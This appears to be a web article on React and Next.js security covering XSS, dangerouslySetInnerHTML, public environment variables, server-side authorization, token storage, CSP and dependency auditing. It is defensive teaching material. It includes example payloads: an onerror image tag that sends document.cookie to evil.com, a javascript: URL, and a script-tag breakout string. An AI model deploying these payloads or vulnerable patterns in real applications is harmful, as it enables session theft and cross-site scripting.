Why Frontend Security Is Systematically Underestimated
There's a persistent myth in web development: security is a backend concern. The frontend just renders things. What's the worst that could happen?
Quite a lot, it turns out.
Frontend vulnerabilities are responsible for some of the most damaging breaches in web history. The 2013 Target breach — 40 million credit cards — began with JavaScript-based skimming. The British Airways breach in 2018 exfiltrated 500,000 customers' payment details entirely through injected client-side scripts. Magecart, the threat group behind dozens of supply chain attacks, operates almost exclusively at the JavaScript layer.
React's architecture provides meaningful security protections out of the box — but they're not magic, they have clear limits, and developers bypass them constantly without realizing the consequences.
This guide covers the specific vulnerabilities most React developers encounter, why they exist, and how to close them properly.
1. XSS in React: The Default Protections and Their Limits
Cross-Site Scripting (XSS) remains the most common web vulnerability year after year. It happens when an attacker gets their script to execute in a victim's browser in the context of your application — giving it access to cookies, tokens, DOM content, and everything your JS can touch.
What React Does Right by Default
React's JSX template system escapes values before rendering them. This is not a convention — it's baked into the reconciler. When you write:
React renders that as the literal text string, not as HTML. The <script> tag never executes. Under the hood, React assigns content via textContent or createTextNode, not innerHTML, which means the browser never parses it as markup.
This protection is automatic and default. You have to actively work to break it.
How React's XSS Protection Breaks Down
DOM-based XSS via third-party libraries: React controls its own rendering, but it doesn't control what happens when you hand data to a third-party library that manipulates the DOM directly — a rich text editor, a chart library, a mapping SDK. These libraries often use innerHTML internally. If you pass unsanitized user data into them, React's protections are irrelevant.
// Dangerous: charting library writes to DOM directly
myChartLib.setTitle(userInput); // ← library uses innerHTML internally
Share this article:
URL injection in href and src: React escapes HTML, but it doesn't validate URLs. The javascript: protocol is valid HTML and a classic XSS vector.
// This renders and executes
const url = "javascript:alert(document.cookie)";
return <a href={url}>Click me</a>; // ← XSS
Always validate URLs before using them in href, src, action, or similar attributes:
Server-Side Rendering (SSR) deserialization: In Next.js and other SSR frameworks, state is often serialized into the HTML for hydration. If that serialization is done naively:
<!-- Dangerous pattern in _document.tsx or similar -->
<script>window.__STATE__ = ${JSON.stringify(state)}</script>
If state contains a string like </script><script>alert(1)</script>, you've broken out of the script tag. Use a serializer that escapes <, >, and & inside JSON strings, or use a library like serialize-javascript.
2. dangerouslySetInnerHTML: When You Really Need It, and When You Think You Do
The name is the documentation. React engineers didn't call it setInnerHTML — they called it dangerouslySetInnerHTML to force you to pause and think.
When you use it, you're telling React: I know what I'm doing, skip the escaping, write this HTML directly. React obliges without question.
// This executes arbitrary JavaScript
const html = { __html: '<img src=x onerror="fetch(`https://evil.com?c=`+document.cookie)">' };
return <div dangerouslySetInnerHTML={html} />;
Legitimate Use Cases
dangerouslySetInnerHTML is appropriate when:
Rendering HTML from a CMS or rich-text editor where the content is controlled by you, not end users
Rendering pre-sanitized HTML from a trusted source
Embedding SVG or mathematical notation (MathJax, KaTeX output)
It is never appropriate when the HTML content originates from user input, URL parameters, third-party APIs you don't control, or any untrusted source.
Sanitize Before You Render
When you genuinely need to render HTML from a less-than-fully-trusted source, sanitize it first using a battle-tested library:
Allowlist, never blocklist: Specify what's allowed, not what's forbidden. Attacker creativity will always outpace your blocklist.
Sanitize server-side too: DOMPurify runs in the browser. For SSR paths, run sanitization on the server using isomorphic-dompurify or a Node-compatible sanitizer.
Audit your ALLOWED_ATTR: href with javascript: is still dangerous. Add a afterSanitizeAttributes hook if you need to validate URL attributes post-sanitization.
3. Environment Variables: What's Actually Public and What Isn't
This is the most frequently misunderstood security topic in React development. Developers see the .env file pattern, assume it provides secrecy, and leak credentials into production.
The Fundamental Rule
In any bundled React application, any value you include in your client-side bundle is public. There are no secrets in the frontend. The build process inlines environment variables into your JavaScript. Anyone can open DevTools, view the source, or unpack your JS bundle and read them.
In Next.js, the convention makes this explicit:
# .env.local
# PRIVATE — never sent to the browser, only available in Node.js server contexts
DATABASE_URL=postgresql://user:password@host/db
STRIPE_SECRET_KEY=sk_live_...
JWT_SECRET=your-signing-secret
# PUBLIC — prefixed with NEXT_PUBLIC_, bundled into client JS, visible to everyone
NEXT_PUBLIC_API_BASE_URL=https://api.yourapp.com
NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY=pk_live_...
NEXT_PUBLIC_ANALYTICS_ID=G-XXXXXXXXXX
The NEXT_PUBLIC_ prefix isn't just a naming convention — it's a deliberate exposure signal. If a variable has that prefix, Next.js inlines it into the browser bundle at build time. If it doesn't, it's only accessible in getServerSideProps, API routes, server components, and other Node.js-side code.
Create React App uses REACT_APP_ for the same purpose. Vite uses VITE_.
What Belongs in Environment Variables
Safe to expose (NEXT_PUBLIC_):
Public API base URLs
Publishable API keys (Stripe publishable key, Segment write key, etc.)
Analytics tracking IDs
Feature flag service public keys
Map provider public tokens (Mapbox, Google Maps)
Never expose (no prefix, server-only):
Database connection strings
API secret keys of any kind
JWT signing secrets
OAuth client secrets
Private keys of any kind
Webhook secrets
Admin credentials
The Repository Leak Problem
.env.local and .env files must be in .gitignore. But .env.example — the template file developers commit to document required variables — must never contain real values:
Use secret scanning tools like git-secrets, truffleHog, or GitHub's native secret scanning to catch leaked credentials before they're pushed. Once a secret is committed to a repository — even if immediately removed — it's compromised. Rotate it immediately.
4. API Exposure: What Your Frontend Reveals About Your Backend
The React app itself is documentation for your API. Open DevTools, go to the Network tab, and interact with the application — every endpoint, every payload shape, every query parameter is visible. Attackers do this as a standard reconnaissance step.
This isn't a problem you can solve in the frontend. It's a constraint to design around.
Don't Rely on Obscurity
Hiding endpoint URLs, encoding payloads, or obfuscating your bundle does not constitute security. A motivated attacker will reverse it. Your API security posture must assume that every endpoint, parameter name, and response shape is known to attackers.
What This Means in Practice
Every API endpoint must authenticate and authorize on the server. Never trust the frontend to enforce access control. If your React app only shows the "Admin" button to admins, but your /api/admin/delete-user endpoint doesn't verify that the requesting user is an admin, you have a broken access control vulnerability (OWASP A01:2021 — the top web vulnerability).
// pages/api/admin/delete-user.ts (Next.js API route)
export default async function handler(req, res) {
// Never skip this. Even if your UI "hides" admin routes.
const session = await getServerSession(req, res, authOptions);
if (!session) {
return res.status(401).json({ error: 'Unauthorized' });
}
if (session.user.role !== 'admin') {
return res.status(403).json({ error: 'Forbidden' });
}
// proceed with deletion
}
Don't expose internal IDs directly. If your URLs or API requests contain sequential numeric IDs (/api/users/1042), an attacker can iterate through them (Insecure Direct Object Reference, IDOR). Use UUIDs or other non-sequential identifiers, and always verify on the server that the requesting user has access to the specific resource.
Minimize API response payloads. Don't return entire database rows when you only need a few fields. A SELECT * that returns a user record with their hashed password, internal flags, and admin metadata — even if you "only display the name and email" in the UI — exposes that data to anyone watching network traffic.
// Bad: returns entire user object including sensitive fields
const user = await db.user.findUnique({ where: { id } });
return res.json(user);
// Good: explicit field selection
const user = await db.user.findUnique({
where: { id },
select: { id: true, name: true, email: true, avatarUrl: true },
});
return res.json(user);
CORS Configuration
Configure CORS carefully on your API. Allowing * (all origins) on any authenticated endpoint is a critical misconfiguration. Your production API should only accept requests from your production frontend origin:
// Restrictive CORS for production
const allowedOrigins = ['https://yourapp.com', 'https://www.yourapp.com'];
const origin = req.headers.origin;
if (allowedOrigins.includes(origin)) {
res.setHeader('Access-Control-Allow-Origin', origin);
}
Note that CORS protects against cross-origin browser requests from other websites. It doesn't protect against direct requests using curl, Postman, or any non-browser client. Server-side authentication is still required.
5. Auth Handling: Tokens, Storage, and the Decisions That Haunt You
Authentication in React is an area with genuinely difficult trade-offs, a lot of cargo-culted advice, and consequences that are hard to reverse once you've shipped.
The Token Storage Debate: localStorage vs. Cookies
This is the most contested frontend security question, and the answer is more nuanced than most Stack Overflow threads suggest.
localStorage / sessionStorage
HttpOnly Cookies
XSS access
✗ Accessible via JS
✓ Inaccessible via JS
CSRF risk
✓ Not auto-sent
✗ Auto-sent with requests
Expiry control
Manual (JS-managed)
Max-Age / Expires header
Subdomain sharing
Same-origin only
Configurable
Server-side revocation
Requires token denylist
Easier with session-based
Implementation complexity
Lower
Moderate
The strong recommendation: Store authentication tokens in HttpOnly, Secure, SameSite=Strict cookies. Here's why:
An HttpOnly cookie cannot be read by JavaScript — not by your code, not by injected attacker code. Even if an XSS vulnerability exists in your app, the attacker cannot exfiltrate the authentication token. localStorage provides zero such protection; any JavaScript running on your page can read it.
SameSite=Strict: Not sent on cross-origin requests (primary CSRF protection)
Max-Age: Hard expiry enforced by the browser
If You Must Use localStorage
If your architecture genuinely requires storing tokens in localStorage (some SPAs with multiple cross-origin API targets have legitimate reasons), apply defense-in-depth:
Implement a strict Content Security Policy to reduce XSS attack surface (more on this below)
Use short-lived access tokens (15 minutes) with refresh token rotation
Store the refresh token in an HttpOnly cookie even if the access token is in localStorage
Implement token binding or sender-constrained tokens where possible
Never Store Sensitive Data in localStorage at All
Beyond auth tokens, developers sometimes store sensitive data in localStorage for convenience — user PII, payment information, decoded JWT payloads containing role information. Don't. Consider localStorage a public billboard: everything in it is visible to any script running on your page.
JWT Claims and Client-Side Trust
If you're using JWTs and decoding them on the frontend to read user roles, display names, or permissions — that's fine for UI purposes. But never use client-side JWT claims to make authorization decisions. A user can modify their localStorage-stored JWT payload (not the signature, but the encoded claims are just base64). Always verify the JWT signature on the server and make authorization decisions there.
6. Content Security Policy: Your Last Line of Defense
Content Security Policy (CSP) is an HTTP response header that tells the browser which sources of content — scripts, styles, images, fonts, frames — are legitimate. A properly configured CSP can neutralize XSS attacks even after they've been injected, because the browser refuses to execute scripts from unauthorized sources.
In Next.js, configure CSP in next.config.js via response headers:
default-src 'self': Fallback for all resource types — only same-origin allowed unless overridden
script-src 'nonce-...': Only scripts with a matching cryptographic nonce execute (use a per-request nonce, not a static value)
frame-ancestors 'none': Prevents your app from being embedded in iframes (clickjacking protection)
base-uri 'self': Prevents <base> tag injection attacks
Avoid 'unsafe-inline' and 'unsafe-eval' in script-src. These directives negate most of CSP's value. Next.js's nonce-based approach is the right way to allow inline scripts without opening the door to XSS.
Start with CSP in report-only mode (Content-Security-Policy-Report-Only) to catch violations before enforcing.
7. Additional Hardening: The Security Headers Checklist
Beyond CSP, several HTTP headers harden your application with minimal effort:
Run your deployed app through securityheaders.com to audit your current header posture.
8. Dependency Security: The Attack Surface You Don't Own
Your React app doesn't just run your code. A typical React project has hundreds of transitive dependencies — code written by thousands of contributors, maintained with varying levels of security diligence.
Supply chain attacks against npm packages are increasingly common and effective. The event-stream incident (2018), the ua-parser-js compromise (2021), and numerous others demonstrate that a single compromised package can affect millions of applications.
Audit regularly:
npm audit
npm audit fix
Pin dependency versions in production (use exact versions or lock files committed to source control). Dependabot and Renovate can automate PRs for dependency updates with CI test coverage.
Prefer packages with:
Active maintenance and recent releases
High download counts and community scrutiny
Minimal transitive dependencies
Clear security disclosure policies
Subresource Integrity (SRI) for externally hosted scripts: if you load scripts from a CDN, add integrity and crossorigin attributes so the browser verifies the script hasn't been tampered with:
Frontend security requires a fundamental perspective shift: your React code runs in an environment you don't control, on hardware you don't own, inside a browser that can be manipulated by extensions, injected scripts, and network-level attackers.
The React component tree is not a security boundary. The browser's JavaScript sandbox is not a security boundary. The only real security boundaries in web applications are:
The server — where authentication, authorization, and data access must be enforced
The network — where TLS, CORS, and HSTS apply
The browser's security primitives — CSP, SameSite cookies, HttpOnly — when used correctly
Every other "protection" in your frontend is UX, not security.
That said, frontend security is not pointless — it's defense-in-depth. Reducing XSS attack surface, protecting tokens from JS access, configuring CSP, auditing dependencies — these measures significantly raise the cost of attacks and stop the vast majority of opportunistic threats.
Security isn't a feature you add. It's a discipline you build into every decision, from how you store a token to how you render a string.
Quick Reference: React Security Checklist
Never use dangerouslySetInnerHTML with unsanitized user input
Validate all URLs before using them in href, src, or action attributes
Store auth tokens in HttpOnly; Secure; SameSite=Strict cookies
Never store secrets, API keys, or sensitive data in localStorage
Prefix only genuinely public values with NEXT_PUBLIC_ (or REACT_APP_, VITE_)
Add .env*.local to .gitignore; use placeholder values in .env.example
Enforce authentication and authorization on every API endpoint, server-side
Use UUIDs or non-sequential IDs to prevent IDOR attacks
Minimize API response payloads — return only fields the client needs
Configure CORS to allowlist specific origins only
Implement Content Security Policy with nonces, not unsafe-inline